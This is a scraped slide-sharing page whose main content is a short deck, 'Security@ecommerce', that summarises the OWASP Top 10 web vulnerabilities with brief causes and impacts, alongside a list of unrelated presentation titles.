What is an RPA CoE?  Session 1 – CoE VisionWhat is an RPA CoE?  Session 1 – CoE Vision
What is an RPA CoE? Session 1 – CoE Vision
 
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectorsConnector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
 
A Deep Dive into ScyllaDB's Architecture
A Deep Dive into ScyllaDB's ArchitectureA Deep Dive into ScyllaDB's Architecture
A Deep Dive into ScyllaDB's Architecture
 
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdfHow to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
 
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned",  Igor Ivaniuk"Frontline Battles with DDoS: Best practices and Lessons Learned",  Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
 
Introduction of Cybersecurity with OSS at Code Europe 2024
Introduction of Cybersecurity with OSS  at Code Europe 2024Introduction of Cybersecurity with OSS  at Code Europe 2024
Introduction of Cybersecurity with OSS at Code Europe 2024
 
Biomedical Knowledge Graphs for Data Scientists and Bioinformaticians
Biomedical Knowledge Graphs for Data Scientists and BioinformaticiansBiomedical Knowledge Graphs for Data Scientists and Bioinformaticians
Biomedical Knowledge Graphs for Data Scientists and Bioinformaticians
 
Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |
 
Christine's Supplier Sourcing Presentaion.pptx
Christine's Supplier Sourcing Presentaion.pptxChristine's Supplier Sourcing Presentaion.pptx
Christine's Supplier Sourcing Presentaion.pptx
 
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
 
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham HillinQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
 
Y-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PPY-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PP
 

Security@ecommerce

  • 2. Where We Are? Recent Attacks on e-commerce sites shows the vulnerability when the intruder was able to make unauthorized calls to see and manipulate the data. • Transaction system calls are open publicly. • Some of Web API calls are still on HTTP. • Same username/password are used across multiple clients/channels. • Most of internal applications are open publicly.
  • 3. Top 10 OWASP Security Guidelines A1 Injection A2 Broken Auth and Session Mgmt A3 Cross site scripting - XSS A4 Insecure Direct Object References A5 Security Misconfigura tion A6 – Sensitive Data Exposure A7 – Missing Function Level Access Control A8 – CSRF A9 – Using components with known vulnerabilities A10 – Unvalidated Redirects and Forwards
  • 4. A1 - Injection How ? • SQL Injection, LDAP query Impact • Unintended commands are executed. • Data can be accessed without proper authentication.
  • 5. A2 – Broken Auth & Session Mgmt. How ? • Authentication and Session management not implemented properly. Impact • Assume user identities and gain access. • Get hold of password, token, session keys.
  • 6. A3 – Cross Site Scripting How ? • Application takes un-trusted data and sends it to a web browser without proper validation or escaping. Impact • Hijack user sessions. • Redirect users to malicious sites.
  • 7. A4 – Insecure Direct Object References How ? • Developer exposes references to files, XML objects, DB keys. Impact • Attackers can manipulate these references to access unauthorized data.
  • 8. A5 – Security Misconfiguration How ? • Web Servers and DB servers do not implement adequate security policies Impact • Unable to trace the origin of a command. • Cannot have good control to
  • 9. A6 – Security Data ExposureHow ? • Hashing and Encryption techniques not adequate while storing Payment info such as passwords, CC etc .. • Payment info transmitted over plain text. Impact • Intruder can get access to Payment info and there by cause brand damage.
  • 10. A7 – Missing Function Level Access Control How ? • Function level access absent on the server at the time of request. • Attackers forge request. Impact • Unauthorized access.
  • 11. A8 – Cross Site Request Forgery How ? • Authentication tokens or cookies are used to forge HTTP requests from victims browser. Impact • The forged requests come as legitimate and there by compromising the application.
  • 12. A9 – Components With Vulnerabilities How ? • Frameworks and components run on full privileges. Impact • Any issue on these will in turn cause issues on the main application.
  • 13. A10 – Unvalidated Requests and Forwards How ? • No validation in place while redirecting to other pages and applications. Impact • Phishing attacks will redirect to applications through which sensitive information can be captured.
  • 14. Next Steps... Proactive approach. Its Better to beef-up rather than repent on later. Security should be constantly reviewed and during code reviews emphasis needs to provided.